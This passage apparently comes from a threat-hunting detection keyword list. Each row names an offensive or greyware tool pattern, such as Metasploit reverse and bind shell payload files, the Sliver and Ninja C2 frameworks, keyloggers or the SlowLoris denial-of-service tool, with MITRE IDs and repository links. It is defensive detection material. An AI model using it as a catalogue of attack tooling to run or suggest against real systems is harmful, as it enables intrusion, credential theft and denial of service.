-*simple_dropper.ninja*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*SimpleHTTPServer.SimpleHTTPRequestHandler*,greyware_tool_keyword,simplehttpserver,quick web server in python,T1021.002 - T1059.006,TA0002 - TA0005,N/A,N/A,Data Exfiltration,https://docs.python.org/2/library/simplehttpserver.html,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*simplekeylogger.*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,1,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*SimplyEmail.py*,offensive_tool_keyword,SimplyEmail,SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.,T1210.001 - T1190 - T1583.001 - T1590,TA0007 - TA0002 - ,N/A,N/A,Reconnaissance,https://github.com/SimplySecurity/SimplyEmail,1,1,N/A,5,10,918,242,2023-01-12T22:20:25Z,2015-10-30T03:12:10Z -*SimplyEmail-master*,offensive_tool_keyword,SimplyEmail,SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.,T1210.001 - T1190 - T1583.001 - T1590,TA0007 - TA0002 - ,N/A,N/A,Reconnaissance,https://github.com/SimplySecurity/SimplyEmail,1,1,N/A,5,10,918,242,2023-01-12T22:20:25Z,2015-10-30T03:12:10Z -*SimplySecurity/SimplyEmail*,offensive_tool_keyword,SimplyEmail,SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.,T1210.001 - T1190 - T1583.001 - T1590,TA0007 - TA0002 - ,N/A,N/A,Reconnaissance,https://github.com/SimplySecurity/SimplyEmail,1,1,N/A,5,10,918,242,2023-01-12T22:20:25Z,2015-10-30T03:12:10Z -*single_reverse_tcp_shell.s*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*single_shell_bind_tcp.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*single_shell_reverse_tcp.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*single_target_exploit.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*sipdump2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*sipvicious_svcrack* -u100,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*sitadel http://*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -*sitadel https://*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -*sitadel.py *,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -*Sitadel-master.zip*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,1,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -*site-packages/wfuzz*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*-Situational-Awareness-BOF*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*skahwah*wordsmith*,offensive_tool_keyword,wordsmith,The aim of Wordsmith is to assist with creating tailored wordlists and usernames that are primarilly based on geolocation.,T1210.001 - T1583.001 - T1583.002,TA0007 - ,N/A,N/A,Credential Access,https://github.com/skahwah/wordsmith,1,1,N/A,N/A,2,158,21,2018-05-03T13:44:01Z,2016-07-06T14:02:51Z -*skelsec/jackdaw*,offensive_tool_keyword,jackdaw,Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.,T1595 - T1590 - T1591,TA0001 - TA0002 - TA0007 - TA0008 - TA0011,N/A,N/A,Reconnaissance,https://github.com/skelsec/jackdaw,1,1,N/A,N/A,6,532,88,2023-07-19T16:21:49Z,2019-03-27T18:36:41Z -*SkipPasswordAgeCheck*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*SkipPortScan*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*skymem-get-mails *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*SLACKAES256Handler.*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*slackor.db*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*sleep_python_bridge.sleepy*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*sleep_python_bridge.striker*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*sleepmask.x64.o*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*sleepmask.x86.o*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*sleepmask_pivot.x64.o*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*sleepmask_pivot.x86.o*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*slemire/WSPCoerce*,offensive_tool_keyword,WSPCoerce,PoC to coerce authentication from Windows hosts using MS-WSP,T1557.001 - T1078.003 - T1059.003,TA0006 - TA0004 - TA0002,N/A,N/A,Exploitation tools,https://github.com/slemire/WSPCoerce,1,0,N/A,9,3,202,29,2023-09-07T14:43:36Z,2023-07-26T17:20:42Z -*SlinkyCat.ps1*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,1,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*SlinkyCat-main*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,1,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*Sliver C2 Session*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*sliver.service*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*sliver.sh/install*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*sliver/.sliver*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*sliver:sliver*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*sliver_pcap_parser.py*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*sliver-client_linux*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*sliver-client_macos*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*sliver-client_windows.exe*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*sliver-dns*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*SliverKeylogger*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213,TA0006 - TA0009,N/A,N/A,Collection - Credential Access - Exfiltration,https://github.com/trustedsec/SliverKeylogger,1,1,N/A,N/A,2,126,37,2023-09-22T19:39:04Z,2022-06-17T19:32:53Z -*sliverpb*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*sliver-server daemon*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*sliver-server.*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*SlowLoris*,offensive_tool_keyword,SlowLoris,Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this,T1498 - T1496 - T1490,TA0002 - TA0004 - TA0007,N/A,N/A,DDOS,https://github.com/gkbrk/slowloris,1,1,N/A,N/A,10,2169,671,2023-05-05T19:21:29Z,2015-04-26T10:00:33Z -*slowloris.py*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By 